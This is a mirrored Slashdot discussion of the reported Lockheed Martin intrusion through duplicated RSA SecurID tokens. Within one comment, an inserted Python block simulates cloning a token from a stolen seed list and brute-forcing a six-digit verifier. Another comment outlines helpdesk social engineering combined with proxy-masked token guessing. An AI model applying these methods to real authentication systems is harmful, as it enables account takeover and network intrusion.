Slashdot Mirror


Duplicate RSA Keys Enable Lockheed Martin Network Intrusion

An anonymous reader writes "Unknown hackers have broken into the security networks of Lockheed Martin Corp and several other US military contractors, a source with direct knowledge of the attacks told Reuters. They breached security systems designed to keep out intruders by creating duplicates to 'SecurID' electronic keys from EMC Corp's RSA security division, said the person who was not authorized to publicly discuss the matter." There's also coverage at PC Magazine.

138 comments

  1. The Security Dance by Frosty+Piss · · Score: 3, Interesting

    …said the person who was not authorized to publicly discuss the matter

    I love it how these companies and even our own government can't keep people from talking about secrets, like it's so fucking juicy that everyone just has to spill it out to the press.

    Yes, I'm not a moron, I know these "not authorized" folks are probably explicitly authorized... It's just the whole security "dance" is so fucking silly.

    --
    If you want news from today, you have to come back tomorrow.
    1. Re:The Security Dance by maxwell+demon · · Score: 1

      …said the person who was not authorized to publicly discuss the matter

      I love it how these companies and even our own government can't keep people from talking about secrets, like it's so fucking juicy that everyone just has to spill it out to the press.

      Yes, I'm not a moron, I know these "not authorized" folks are probably explicitly authorized... It's just the whole security "dance" is so fucking silly.

      Except if it's a conspiracy, of course. Everyone knows that the government manages to keep its conspiracies completely secret.

      --
      The Tao of math: The numbers you can count are not the real numbers.
    2. Re:The Security Dance by __aaqvdr516 · · Score: 2

      The usual way that press inquiries are handled is to have all personnel direct any inquiries to the PR officer or group. It is usually someone who has no real knowledge of what happened and only gives scripted responses to inquiries.

      Since they have real information on how the breach occurred, I'd bet it really was someone who was unauthorized to speak spilling the beans.

    3. Re:The Security Dance by Xtifr · · Score: 1

      I love it how these companies and even our own government can't keep people from talking about secrets

      Sure they can! It's just that they're only good at it when it concerns UFOs and JFK's assassination and Bigfoots and the faked moon landing and the Illuminati and the herds of Invisible Pink Unicorns thundering across the Great Plains, and things like that.

    4. Re:The Security Dance by yuhong · · Score: 1

      Yea, legacy PR based on control of the message is fundamentally flawed.

    5. Re:The Security Dance by OpenLegs · · Score: 2

      Agreed, more FUD to support renewal of the Patriot Act.

    6. Re:The Security Dance by erroneus · · Score: 2

      Not necessarily. I seem to recall about a month or two ago a story came out about a serious compromise in RSA's systems which was said to have the potential to compromise most, if not all, SecureID devices out there.

      I recall when this story came out, I asked "Should we be concerned about this?" We use SecureIDs to get into the company network...

    7. Re:The Security Dance by Anonymous Coward · · Score: 0

      Uuum, look at all the conspiracy theory websites! Apparently, they can't keep anything secret.
      It's just that for conspiracies, they don't even have to. Since nobody would believe it anyway.
      .
      .
      Which gives me an idea for the perfect crime... ;)

    8. Re:The Security Dance by Jah-Wren+Ryel · · Score: 1

      Since they have real information on how the breach occurred, I'd bet it really was someone who was unauthorized to speak spilling the beans.

      That's the way it works for most businesses, but not the way it works for government agencies.

      As Lockmart is the largest corporate member of the military industrial complex, things are a little bit different in this case. There are national security implications to both Lockheed being hacked and to RSA tokens being duplicable. That makes for all kinds of motives for a "controlled" leak like this, for all we know it is 100% spin designed to cover some other worse(?) scenario.

      --
      When information is power, privacy is freedom.
    9. Re:The Security Dance by _Sprocket_ · · Score: 1

      That's the way it works for most businesses, but not the way it works for government agencies.

      As Lockmart is the largest corporate member of the military industrial complex, things are a little bit different in this case. There are national security implications to both Lockheed being hacked and to RSA tokens being duplicable. That makes for all kinds of motives for a "controlled" leak like this, for all we know it is 100% spin designed to cover some other worse(?) scenario.

      Ahhh - the language of conspiracy. We know we're in for some really good non-information as soon as "Lockmart" and "military industrial complex" are uttered. Yes - serious implications for Lockheed's compromise (psst - not the first time). Serious implications for RSA tokens being duplicated - definitely. Then we'll just play "I've got a secret" and end it with vague mention of "all kinds" of spin and unnamed scenarios. That should be enough to get lots of head-nodding from the anti-military political crowd and other conspiracy theorists.

    10. Re:The Security Dance by _Sprocket_ · · Score: 2

      Not necessarily. I seem to recall about a month or two ago a story came out about a serious compromise in RSA's systems which was said to have the potential to compromise most, if not all, SecureID devices out there.

      Potential - yes. In so far as RSA wasn't really being too frank about what was involved. So since the compromise involved the SecurID product in some way, who's to know exactly what's going on? The potential is there.

      I recall when this story came out, I asked "Should we be concerned about this?" We use SecureIDs to get into the company network...

      To which RSA assured everyone that they should be following "best practices" and maybe paying a lot more attention to failed authentication attempts. Yeah - thanks.

      The possible implication here is that RSA has been far, far less forthcoming than they should have been about this incident. Which has me wondering if we really should be trusting their product in our own environment.

    11. Re:The Security Dance by PPH · · Score: 1

      Those websites are all manufactured and contain false information. To keep you from looking in the right places.

      The proof that there is a secret conspiracy is that we have no evidence of it. Now excuse me while I polish my tinfoil hat.

      --
      Have gnu, will travel.
    12. Re:The Security Dance by Yvan256 · · Score: 1

      You fool! The more you polish it, the more it reverses the polarity!

    13. Re:The Security Dance by milkmage · · Score: 1

      WTF Patriot Act? Hacking was illegal prior to 9/11

    14. Re:The Security Dance by Runaway1956 · · Score: 0

      If hacking were illegal, then some pretty famous people would still be locked up. Bill Gates, Steve Jobs, and Linus Torvalds come readily to mind. Microsoft employees by the hundreds. Apple employees by the score. Probably all of the anti-malware companies would lose their most valuable people.

      Had you said that "espionage" and "theft by wire" were illegal before 9/11, your post would have made more sense. "Hacking" is not, nor has it ever been illegal - TOS's and EULA's notwithstanding.

      --
      "Windows is like the faint smell of piss in a subway: it's there, and there's nothing you can do about it." - Charlie Br
    15. Re:The Security Dance by Anonymous Coward · · Score: 0

      Pedantry and willful ignorance. I'm quite sure you knew the parent meant "hacking" as in breaking into remote computer systems to access sensitive information, i.e. computer fraud. Yet you choose to ignore the reasonable meaning of the term in context in strict adherence to the hobbyist term, just to make an irrelevant point.

      Sad thing is these kind of pointless ripostes are the quickest ones to get modded up around here.

    16. Re:The Security Dance by Jah-Wren+Ryel · · Score: 1

      WTF? Everything I wrote is pretty much self-evident.

      Getting their unclass network breached is a freaking obvious problem.

      It is no secret that the military uses RSA tokens all over the place either. It is also no secret that RSA guards the source code at the heart of their authentication system pretty jealously - not even including it in their SDK. And the idea that RSA tokens may now be duplicable due to the prior theft of that source was in the goddamn HEADLINE of the story here.

      On the nature of the unauthorized source actually being deliberate - the government does that all the time.

      As for the term "Lockmart" - everybody else in the industry and even some of their own employees use it, the ones who like to tweak the others that have a stick up their ass about it.

      --
      When information is power, privacy is freedom.
    17. Re:The Security Dance by Anonymous Coward · · Score: 0

      Why in the hell didn't RSA fix the problem and regenerate keys and replace all the devices? If they're so hidebound they did not have an improved product waiting, and so arthritic they could not get this manufactured and distributed by now, they don't need to be in business.

      The last time I handled classified data it was never allowed on any non-NSA-approved computer that had a wire leaving the building, be it network or phone, that did not have an NSA-approved encryption device.

      This does not count for either deliberate action or human error in transferring classified material to a forbidden system but employees are usually well trained and informed of the consequences.

    18. Re:The Security Dance by melikamp · · Score: 1

      I thought you are just talking out of your ass, but then I read your nick... and dude, wow. How could we be so blind? Preach on, brother.

    19. Re:The Security Dance by JD770 · · Score: 0

      Like the "demotivational" poster says: If you're not part of the solution, there's good money to be made in prolonging the problem.

    20. Re:The Security Dance by Anonymous Coward · · Score: 0

      I read it as though they are pissed they got compromised, and they want to hang this squarely on RSA but you can't do that in a press conference. So they have someone in the know drop the story out there.

    21. Re:The Security Dance by Sulphur · · Score: 1

      You fool! The more you polish it, the more it reverses the polarity!

      That is Al hats, not genuine Sn hats.

    22. Re:The Security Dance by _Sprocket_ · · Score: 1

      WTF? Everything I wrote is pretty much self-evident.

      Getting their unclass network breached is a freaking obvious problem.

      Well, yes. Everything is pretty much self-evident except for the part that goes:

      That makes for all kinds of motives for a "controlled" leak like this, for all we know it is 100% spin designed to cover some other worse(?) scenario.

      What's the motive for a controlled leak? What possible worst-case scenarios? If you're going to invoke conspiracy, at least entertain us with one.

      It is no secret that the military uses RSA tokens all over the place either. It is also no secret that RSA guards the source code at the heart of their authentication system pretty jealously - not even including it in their SDK. And the idea that RSA tokens may now be duplicable due to the prior theft of that source was in the goddamn HEADLINE of the story here.

      I agree for the most part. Although the big question is exactly what RSA's intrusion meant. We don't know how this intrusion endangered the SecurID product line. And that's the rub. IMHO, a security company shouldn't be leaving questions about their products like that unanswered.

    23. Re:The Security Dance by Jah-Wren+Ryel · · Score: 1

      What's the motive for a controlled leak? What possible worst-case scenarios? If you're going to invoke conspiracy, at least entertain us with one.

      If RSA isn't at fault but everyone thinks they are, then that does a lot of things. Like political cover for Lockheed management doing something stupid that actually enabled the breach - say poor protection against spear-phishing attacks. Or security through misdirection - maybe the real vulnerability is present in other systems and they are hoping that other bad guys won't figure it out in time to take advantage of it if everybody thinks RSA is compromised instead.

      --
      When information is power, privacy is freedom.
  2. Uplink by Jasoman · · Score: 1

    All these security breaches remind me of the game Uplink.

    1. Re:Uplink by Opportunist · · Score: 1

      Every time I played it I found it hilarious that I could time and again hack the same "high security" servers with the same approach, every time resulting in a story about a "yet again" security breach at some important database, and I was sitting there snickering, thinking something like this would just be unthinkable in reality since they'd of course analyze how I got in and seal that security hole.

      --
      We used to have a Bill of Rights. Now, with the rights gone, all we have left is the bill.
    2. Re:Uplink by sortius_nod · · Score: 1

      thinking something like this would just be unthinkable in reality since they'd of course analyze how I got in and seal that security hole.

      Yeh, that's a nice fantasy. Unfortunately that's not how things go. Look at Sony, they still haven't fixed their security problems and it's been over a month.

    3. Re:Uplink by WrongSizeGlass · · Score: 1

      All these security breaches remind me of the game Uplink.

      All these security breaches remind me that the world has changed in an irrevocable manner and that it's only a matter of time before anything and everything falls victim to these types of attacks. Nothing is really safe anymore.

    4. Re:Uplink by Blackbrain · · Score: 1

      All these security breaches remind me that the world has changed in an irrevocable manner and that it's only a matter of time before anything and everything falls victim to these types of attacks. Nothing is really safe anymore.

      Nothing ever was. The only difference now is that this one made the news.

      --
      Where would we be if Wheel had hid her round rock in a cave instead of showing everyone how it rolls?
    5. Re:Uplink by TapeCutter · · Score: 1

      So you're saying the sony network is back up and anyone can use the same hole?

      --
      And did you exchange a walk on part in the war for a lead role in a cage? - Pink Floyd.
    6. Re:Uplink by Tridus · · Score: 1

      If they really got in by duplicating an RSA token, sealing the hole requires figuring out how they managed to do that. Not as simple as it sounds.

      --
      -- "So they told me that using the download page to download something was not something they anticipated." - Bill Gates
    7. Re:Uplink by Runaway1956 · · Score: 0

      All this time, I've been thinking that Sony IS the security problem. Visa, Mastercard, and Bank of America didn't leak all those users' credentials - Sony did. Sony doesn't "have" security problems, they are the problem!

      --
      "Windows is like the faint smell of piss in a subway: it's there, and there's nothing you can do about it." - Charlie Br
    8. Re:Uplink by Anonymous Coward · · Score: 0

      All you need to duplicate an RSA token is a list of all secrets, the algorithm to generate the answers from the secrets, and you need to observe enough authentications to disambiguate that token's secret from your list of secrets. And enough CPU or time to calculate responses to all secrets for the first observed authentication.

      Not easy, but possible if you've got the list of secrets.

    9. Re:Uplink by milkmage · · Score: 1

      "something like this would just be unthinkable in reality since they'd of course analyze how I got in and seal that security hole"

      putting the cap back on the toothpaste prevents more from coming out, but it doesn't clean up the mess on the counter.

  3. Aha! by wiedzmin · · Score: 2

    So this is what they hacked RSA for! I was waiting to find out who the end-target was... makes sense.

    --
    Bow before me, for I am root.
    1. Re:Aha! by slartibartfastatp · · Score: 1

      I bet they used the d-wave they just bought.

      --
      -- --
    2. Re:Aha! by fuzzyfuzzyfungus · · Score: 3, Funny

      I, for one, am shocked, shocked, that RSA's assertion that the breach was minor and totally, not, y'know, a real world issue was less than 100% truthful...

    3. Re:Aha! by GameboyRMH · · Score: 1

      They chose an excellent target, imagine the technological goodies you'd find at Lockheed Martin, a company elbow-deep in every corner of the US military's black projects, the company that built the A-12, basically a slightly smaller and slightly less refined SR-71, in the '50s. Imagine what they're doing today.

      --
      "When information is power, privacy is freedom" - Jah-Wren Ryel
    4. Re:Aha! by markkezner · · Score: 1

      Although it's possible that Lockheed was the end target of the RSA crackers, it's also possible that the fruits of the RSA hack were simply sold to the people who then used it to do the Lockheed break in.

      --
      Dangerous, sexy, turing complete: Femme Bots
    5. Re:Aha! by TheLink · · Score: 1

      Maybe it'll be another Brit who claims to be looking for UFOs or aliens...

    6. Re:Aha! by Stupendoussteve · · Score: 1

      The company that built the A-12 also built the SR-71, U-2, F-22, F-35 and who knows what else.

  4. Mmm... by Oxford_Comma_Lover · · Score: 1

    China, Iran, India, or someone planning to sell it (Russia, Organized Crime, etc...)?

    I suppose Israel could do it too. (They'd risk a bit if they got caught, but we know they have the capability.)

    --
    -- IANAL, this isn't legal advice, and definitely isn't legal advice for you. Also, Squee!
    1. Re:Mmm... by Frosty+Piss · · Score: 1

      China, Iran, India, or someone planning to sell it (Russia, Organized Crime, etc...)?

      China has the most to gain.

      --
      If you want news from today, you have to come back tomorrow.
    2. Re:Mmm... by Angostura · · Score: 1

      So you're excluding Boeing?

    3. Re:Mmm... by WrongSizeGlass · · Score: 1, Troll

      So you're excluding Boeing?

      Let's not exclude the US government either. Nothing points the finger elsewhere like attacking one of your own major contractors. The NSA, CIA, etc aren't above stealing the RSA keys. /tinfoilhat

    4. Re:Mmm... by Anonymous Coward · · Score: 0

      Any thief gains if they can find a buyer for their stolen goods. Certainly there is more than one country or one non-state actor in the world who would want valuable US defense contractor data just to sell to other interested buyers across the globe. Even another US defense contractor competitor may be responsible. I'm not sure why China is always thought to be the culprit unless this is some attempt to drum up a new "Red Scare".

    5. Re:Mmm... by Anonymous Coward · · Score: 0

      Why would Israel do it? If they wanted advanced military hardware from the USA, all they have to do is ask. It's not like the USA hasn't already given them pretty much the same hardware which the USAF/marines/army/etc already use (and the plans so they can build them themselves)...

    6. Re:Mmm... by Anonymous Coward · · Score: 0

      Getting the hardware is not like getting the hardware and the construction plans. Even if you don't plan to steal the design, you might want to know if the hardware has backdoors and how to defeat them. You might want to service them without needing external parties. Total ownership is important, we're talking about arms, not PS3s or Windows PCs.

      Having said that, if Israel could get nuke technology from the west, it probably has enough ties to get all the rest without needing to break into systems.

    7. Re:Mmm... by Dasher42 · · Score: 1

      It was the Cylons.

  5. Spoken like a true spokesperson... by Zakabog · · Score: 4, Insightful

    and we remain confident in the integrity of our robust, multi-layered information systems security

    Translation: Our system's breached but maybe you won't realize that if I throw enough buzz words at you...

    1. Re:Spoken like a true spokesperson... by betterunixthanunix · · Score: 4, Insightful

      On the other hand, a robust security system should be able to keep your most important information secure even when a breach occurs at lower levels. So, perhaps a breach occurred that allows some expense reports to be copied but does not enable the attackers to obtain designs for stealth aircraft. A breach is not a good thing, but it does not have to be an all-or-nothing scenario.

      --
      Palm trees and 8
    2. Re:Spoken like a true spokesperson... by Frosty+Piss · · Score: 1

      It might have been "multi-layered", but clearly was not "robust".

      --
      If you want news from today, you have to come back tomorrow.
    3. Re:Spoken like a true spokesperson... by Anonymous Coward · · Score: 0

      On the other hand, a robust security system should be able to keep your most important information secure even when a breach occurs at lower levels. So, perhaps a breach occurred that allows some expense reports to be copied but does not enable the attackers to obtain designs for stealth aircraft. A breach is not a good thing, but it does not have to be an all-or-nothing scenario.

      Indeed. At the defense contractor where I worked, all computers with classified documents were kept isolated in a locked room with no internet connection. The room was also guarded by a guy who knew by sight everyone who had access. They also prevented anyone from bringing in USB drives and the like.

    4. Re:Spoken like a true spokesperson... by Doctor_Jest · · Score: 1

      Usually I just chalk this up to the morons they hire in the admin departments... but suffice to say, the worst the breach could've gotten, even from a Defense Contractor, is trade secrets... and possibly some unclassified designs and whatnot. (Classified systems are not facing the internet. Ever.) And of course a huge PR hit to Lockheed Martin's ability to claim they can keep anything "secret." :)

      They also might've gotten some foreign contract information... depending upon how far they snooped. :) It depends... some foreign entities prefer the same security the US DoD has.. (more or less. heh.)


      --
      It's the Stay-Puft Marshmallow Man.
    5. Re:Spoken like a true spokesperson... by Jah-Wren+Ryel · · Score: 2

      Indeed. At the defense contractor where I worked, all computers with classified documents were kept isolated in a locked room with no internet connection.

      However, that is not necessarily the case for information that individually is unclassified but in aggregate is classified. The government security folks have a name for that stuff, I just can't recall it at the moment. If an attacker were able to hoover up enough stuff from lockmart's unclassified networks it would be valuable intelligence to the government of some place like China or Israel.

      --
      When information is power, privacy is freedom.
    6. Re:Spoken like a true spokesperson... by Anonymous Coward · · Score: 0

      "Translation: Our system's breached but maybe you won't realize that if I throw enough buzz words at you..."

      Further translation: We just passed the bill extending the Patriot Act for 4 more years. We have to "create" some press about why it was necessary to go against our campaign promises.

    7. Re:Spoken like a true spokesperson... by AmiMoJo · · Score: 1

      Problem is that once your attacker has the private key they can impersonate the server and/or perform man-in-the-middle attacks. That could get them passwords and keys for everything else because things like SSH and RDP rely on the connection being secure enough to send raw key presses as the user logs in etc. Loss of private keys is pretty serious.

      --
      const int one = 65536; (Silvermoon, Texture.cs)
      SJW, n: "Someone I don't like, and by the way I'm a fuckwit" - AC
    8. Re:Spoken like a true spokesperson... by Anonymous Coward · · Score: 1

      Disclaimer: I work for Boeing in Information Security.

      Todd Kelley is communications and not incident detection and response. He most likely has no clue on the state of the network and probably did not have time to contact someone and find out when he gave that statement.

      That said, we do not rely on RSA SecurIDs. As soon as the initial breach of RSA was reported, any SecurIDs in use were basically force retired.

    9. Re:Spoken like a true spokesperson... by betterunixthanunix · · Score: 1

      Assuming you only have one key for all security levels, which would be a pretty bad idea.

      --
      Palm trees and 8
    10. Re:Spoken like a true spokesperson... by the_B0fh · · Score: 1

      you forget one thing. Typically RSA tokens are used for the high value shit, the hardest to get to, most protected shit.

      so, this is RSA token being duplicated. Guess what. Major fault.

    11. Re:Spoken like a true spokesperson... by Rich0 · · Score: 1

      I still have no idea why RSA of all places would implement their tokens in this manner. If they just used an asymmetric cipher (like RSA!) it would be immune to this kind of attack.

      There is no reason that any device other than the keyfob itself needs to be able to generate the numbers. Other devices merely need to authenticate if a number is correct - which can be done separately just as with any other asymmetric system.

      However, I do see a weakness in this - the PINs that are generated need to be much longer, or the system has to be so heavily salted that it takes a very long time to verify a single PIN. With a six-digit PIN you just need to ask "Is 000001 the right PIN for 5:30:00PM tomorrow?" and repeat a million times until you can generate a PIN for any arbitrary time using only the authentication checking info. You can't do that with any sane system because the challenge/response is MUCH longer. VERY heavy salting would also work, but you probably don't want it to take 20 minutes of 100% CPU to verify a PIN on some loaded server.
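
      Two comments in this thread describe attacks that are worth seeing run: the Anonymous Coward's recipe in the Uplink thread (a list of all token secrets, the code-generation algorithm, and a few observed authentications to single out one token's secret), and Rich0's objection above that a six-digit code turns any verifier, asymmetric or not, into an oracle that can simply be asked a million times. The block below is an added example written for this page; it is not code from RSA, Lockheed Martin, or any commenter. It assumes a stand-in token algorithm (HMAC-SHA1 over a 60-second time step, truncated to six digits), a constructed seed database, constructed login timestamps, and a verifier with no lockout; the real SecurID algorithm and seed format are not reproduced here.

```python
import hashlib
import hmac
import random
import struct

DIGITS = 6          # code length shown on the token display
STEP_SECONDS = 60   # assumption: the token shows a new code every minute


def token_code(seed: bytes, unix_time: int) -> str:
    """Stand-in token algorithm (an assumption for this example, not RSA's):
    HMAC-SHA1 over the time-step counter, truncated to DIGITS decimal digits."""
    counter = struct.pack(">Q", unix_time // STEP_SECONDS)
    mac = hmac.new(seed, counter, hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    value = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return f"{value % 10 ** DIGITS:0{DIGITS}d}"


def build_stolen_seed_db(count: int, rng_seed: int = 1234) -> dict:
    """Constructed sample data standing in for the stolen 'list of all secrets':
    one 128-bit seed per token serial, generated deterministically."""
    rng = random.Random(rng_seed)
    return {f"TOKEN-{i:06d}": rng.getrandbits(128).to_bytes(16, "big")
            for i in range(count)}


def narrow_candidates(seed_db: dict, observations: list) -> tuple:
    """Keep only the seeds that would have produced every observed
    (timestamp, code) pair for one victim. Returns the surviving serials
    and the survivor count after each observation."""
    survivors = set(seed_db)
    history = []
    for unix_time, code in observations:
        survivors = {serial for serial in survivors
                     if token_code(seed_db[serial], unix_time) == code}
        history.append(len(survivors))
        if len(survivors) <= 1:
            break
    return survivors, history


def expected_false_matches(db_size: int, observations: int) -> float:
    """A wrong seed survives one observation with probability 10**-DIGITS,
    so about N / 10**(DIGITS*k) wrong seeds remain after k observations."""
    return db_size / (10 ** DIGITS) ** observations


def make_verifier(seed: bytes):
    """Server-side check that knows the seed and answers yes/no, with no
    lockout (assumption). Codes are cached per time step."""
    cache = {}

    def verify(code: str, unix_time: int) -> bool:
        step = unix_time // STEP_SECONDS
        if step not in cache:
            cache[step] = token_code(seed, unix_time)
        return hmac.compare_digest(code, cache[step])
    return verify


def oracle_search(verify, unix_time: int) -> tuple:
    """Rich0's point: with a short code and a verifier that answers freely,
    no seed is needed, only up to 10**DIGITS queries. Returns (code, queries)."""
    for guess in range(10 ** DIGITS):
        code = f"{guess:0{DIGITS}d}"
        if verify(code, unix_time):
            return code, guess + 1
    return None, 10 ** DIGITS


def simulate_attack(db_size: int = 50000, victim: str = "TOKEN-004242") -> dict:
    """End-to-end walk-through on the constructed data."""
    seed_db = build_stolen_seed_db(db_size)
    victim_seed = seed_db[victim]
    # Codes the attacker captured at three logins (constructed timestamps)
    login_times = [1_306_500_000, 1_306_586_400, 1_306_672_800]
    observed = [(t, token_code(victim_seed, t)) for t in login_times]
    survivors, history = narrow_candidates(seed_db, observed)
    # With the seed identified, cloning the token is just running the algorithm
    (serial,) = survivors
    later = 1_306_759_200
    forged = token_code(seed_db[serial], later)
    genuine = token_code(victim_seed, later)
    # Without any seed: brute-force the verifier for the same time step
    found, queries = oracle_search(make_verifier(victim_seed), later)
    return {
        "survivors_per_observation": history,
        "identified": serial,
        "forged_matches": forged == genuine,
        "oracle_found": found == genuine,
        "oracle_queries": queries,
    }
```

      With 50,000 stolen seeds, the first observed code already leaves on average only 0.05 wrong seeds standing, so one or two sniffed logins identify the token; that is why the seed list, not the algorithm, is the crown jewel. The oracle search shows the other half of Rich0's argument: whatever the verifier does internally, a six-digit code gives an attacker who can query it without lockout at most a million tries, which is why failed-authentication monitoring and lockouts matter as much as the token design.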

    12. Re:Spoken like a true spokesperson... by betterunixthanunix · · Score: 1

      Really? The last time I was issued one of those, I was not in a very high level position; I was just an intern on a development team. My access was limited; I had some access to business documents (mainly from company mailing lists), but I could not access all systems, particularly not the high security systems.

      --
      Palm trees and 8
    13. Re:Spoken like a true spokesperson... by StickyWidget · · Score: 1
      Multiple keys wouldn't have helped, since it appears the attackers identified all the seeds that were ordered by Lockheed from RSA. Whatever process they used to assign these seeds to unique individuals would have been robust enough to notice that the individual was using two.

      It was endgame. Everyone should have trashed all their tokens weeks ago.

      ~Sticky

    14. Re:Spoken like a true spokesperson... by ShnowDoggie · · Score: 1

      Remember when the Presidential helicopters were redesigned to be better a few years ago? The security there failed and the plans were released on the Internet. Never say never!

    15. Re:Spoken like a true spokesperson... by Anonymous Coward · · Score: 0

      You're missing the point---the important stuff isn't on the same network. It's on its own network, physically separated from any internal network, and in a tightly controlled and secure room, floor, or building. The keys are worthless.

      Yes, in a company that size, random data will leak through. Some of it will be proprietary data, sensitive, or personal info. However, you can be pretty sure it's not classified, never mind top secret, and certainly not black.

      These people aren't idiots. They spend most of their lives in secure rooms, they often can't tell anyone, even their coworkers, what they're doing, they work crazy hours, nearly all of them have advanced, highly specialized and technical engineering degrees, they're all cleared for top secret, and most things that they're doing involve constant security checks for even routine tasks.

      So. Yeah. Sure, shit happens, but, believe me, we've thought of these things.

      -guy who works in the industry

    16. Re:Spoken like a true spokesperson... by Anonymous Coward · · Score: 0

      This is in fact exactly correct. The article even states

      Defense contractors' networks contain sensitive data on sophisticated weapons systems, but all classified information is kept on separate, closed networks managed by the U.S. government

      I work first hand with security systems like this and even computers that store information classified as SECRET are not on the same physical network as computers that contain information classified as TOP SECRET. It only makes sense. Those hackers compromised the networks but I'm certain they didn't get anything classified from their attack.

    17. Re:Spoken like a true spokesperson... by Fallen+Kell · · Score: 3, Insightful

      For anyone working at a place like this, they know that the real data is on a separate network which has no physical connection to the internet. The only data that could possibly have been compromised would be unclassified, business trade secrets, and/or proprietary information.

      As the one official said (which was almost completely ignored by the article's authors), there should be little risk to actual projects. Really, what they got was access to "TPS reports", and other such documents. Now, there may be an issue with "Export Control" as even if some documents are unclassified, they may not be allowed to be transmitted to certain countries. But all the real information is on that other network which you need physical access to hack, which is one of the easiest things to secure.

      --
      We were all warned a long time ago that MS products sucked, remember the Magic 8 Ball said, "Outlook not so good"
    18. Re:Spoken like a true spokesperson... by EETech1 · · Score: 1

      Lockheed Martin confirms attack on its IT network
        (AFP)
      1 hour ago
      WASHINGTON - US defense contractor Lockheed Martin has confirmed that it had detected "a significant and tenacious" attack on its information systems network.
      "Lockheed Martin detected a significant and tenacious attack on its information systems network," said a company statement.
      The company's information security team detected the attack almost immediately and took what is described as "aggressive actions" to protect all systems and data, the statement added.
      "As a result of the swift and deliberate actions taken to protect the network and increase IT security, our systems remain secure," Lockheed Martin said.
      "No customer, program or employee personal data has been compromised."
      The incident was under investigation, and Lockheed Martin said it was keeping appropriate US government agencies informed of the situation. It did not mention any suspected source of the cyber-attack.
      The company said that despite the attack, it remained confident in the integrity of its "robust, multi-layered information systems security."

    19. Re:Spoken like a true spokesperson... by schnell · · Score: 1

      Typically RSA tokens are used for the high value shit, the hardest to get to, most protected shit.

      In parts of the corporate world? Maybe. (Debatable though since my company uses RSA tokens and every Joe Sixpack with a laptop has one.)

      In the US government? Not a chance. Information whose unauthorized release poses a threat to national security is "classified" and access restricted to networks which are 1.) logically airgapped from public networks and 2.) wouldn't let an RSA token get within spitting distance. This applies for defense contractors too... if it was a publicly accessible network they got into via spoofed RSA tokens, I can guarantee you it did them no good for getting the real juicy stuff unless Northrop Grumman seriously botched their Information Assurance architecture. And screwing that up doesn't result in bad press, it results in people wearing orange jumpsuits in Fort Leavenworth.

      --
      "95% of all Slashdot .sig quotes are incorrect or completely fabricated." -Benjamin Franklin
    20. Re:Spoken like a true spokesperson... by Anonymous Coward · · Score: 0

      If people followed routines, that is. They do not follow routines. Have a look at all the illegal private pictures of seemingly illegal activities from the current major war zones.

      The soldiers are not allowed to do this, so they do it on a regular basis. Trust people to do whatever is convenient, often putting themselves at risk by doing it.

    21. Re:Spoken like a true spokesperson... by Anonymous Coward · · Score: 0

      If they just used an asymmetric cipher (like RSA!) it would be immune to this kind of attack.

      The RSA algorithm uses lots of energy. A small lithium button cell would not last the required 500,000+ update cycles.

      The RSA algorithm is also more susceptible to side channel attacks (due to the variable-length computations). Algorithms that use fixed-width data are easier to secure.

    22. Re:Spoken like a true spokesperson... by hey! · · Score: 1

      Except the spokesman, whether or not he is speaking truthfully, is describing the way things *should* be. Policies and procedures should not be built around the assumption that everything *works*. They should assume that at any given time something or things might not be working.

      Anyone familiar with MySQL's permissions systems knows that one of the niftier things about it is that you can differentiate between the rights you give a user depending on the IP address or network his session originates from. You may only allow certain things to be done (typically administrative things) if the user is physically working on a specific machine (typically the server host). Of course it's up to you to think through whether you should allow ssh access to that machine. But this is an example of the philosophy I'm talking about. You don't assume that credentials (e.g., user name and password) can be relied upon without fail. You assume they're going to fail, and make the tradeoff between convenience (authorizing everything based on credentials alone) and security (only allowing admins to log in from the physical server) accordingly.

      --
      Post may contain irony: discontinue use if experiencing mood swings, nausea or elevated blood pressure.
    23. Re:Spoken like a true spokesperson... by Anonymous Coward · · Score: 0

      All well and good, but that doesn't mean they didn't want TPS reports in the first place.

    24. Re:Spoken like a true spokesperson... by Doctor_Jest · · Score: 1

      The presidential helicopters themselves aren't the problem. The avionics and electronic warfare stuff inside is what really counted, and that wasn't leaked. There were several foreign contractors involved in that as well... sort of like the unclassified portions of the F-35 being siphoned off by a subcontractor out of Turkey (I believe.)

      I am not saying it's never going to happen. It just takes more than this to get to it. There is no way to get it via the internet. There is no classified anything connected to the internet... if there is, someone's head will (literally) roll. :)

      --
      It's the Stay-Puft Marshmallow Man.
  6. Does RSA store usernames and pins? by solarium_rider · · Score: 3, Insightful

    Can someone explain what was actually stolen from RSA that allowed them to break into the networks? From what I understand, even if you had a duplicate SecurID number generator, you would still need the username and SecurID password (fixed code + random 6 digits) associated with the account to get into the network. Once you are into the network you probably also need a username (same as above) and user password to access the machines. This sounds more like the attackers must have had significant insider knowledge to get in.

    --
    -- How many sigs are as useless as this one?
    1. Re:Does RSA store usernames and pins? by Dunbal · · Score: 1

      Well, see, the people used the same password at work as they used for PSN...

      --
      Seven puppies were harmed during the making of this post.
    2. Re:Does RSA store usernames and pins? by betterunixthanunix · · Score: 1

      I think they found a way to synchronize their copied SecurID tokens with the victims', thus reducing the attack to figuring out the victim's password.

      --
      Palm trees and 8
    3. Re:Does RSA store usernames and pins? by Spad · · Score: 2

      Usernames and passwords are trivial to socially engineer; most people you ask will give you their password without you even asking for it if you claim to be "from IT".

    4. Re:Does RSA store usernames and pins? by Professor_UNIX · · Score: 1

      Exactly. Even if the seed files for the token were stolen, RSA still has no information about what seed file information was associated with what user! A company like Lockheed Martin could have tens of thousands of SecurID tokens. The permutations for users to tokens to guessing PINs is still astronomical unless an insider was involved that had access to the SecurID database.

    5. Re:Does RSA store usernames and pins? by Yaur · · Score: 1

      Not that far fetched TBH.

    6. Re:Does RSA store usernames and pins? by blincoln · · Score: 2

      "The permutations for users to tokens to guessing PINs is still astronomical unless an insider was involved that had access to the securid database."

      Maybe. But if you think about it, there are approaches that would only require a lot of attempts, not an "astronomical" number. If you know the username of an employee and whatever Lockheed-Martin's helpdesk uses for verification (last four SSN digits or whatever), you can have their password and SecurID PIN reset. Then just try that PIN with every cloned token in your possession. Trying different PINs with the same token will cause a lockout, but will trying each token once with the same PIN? I'm pretty sure that would go unnoticed, especially if the attempts were made from different proxy servers to mask the source IP all being the same.

      It could also be that RSA had network captures or SecurID database backups or something along those lines *from* Lockheed-Martin that were sent in for troubleshooting purposes, and *those* were stolen as well.

      --
      "...always new atoms but always doing the same dance, remembering what the dance was yesterday." -Richard Feynman
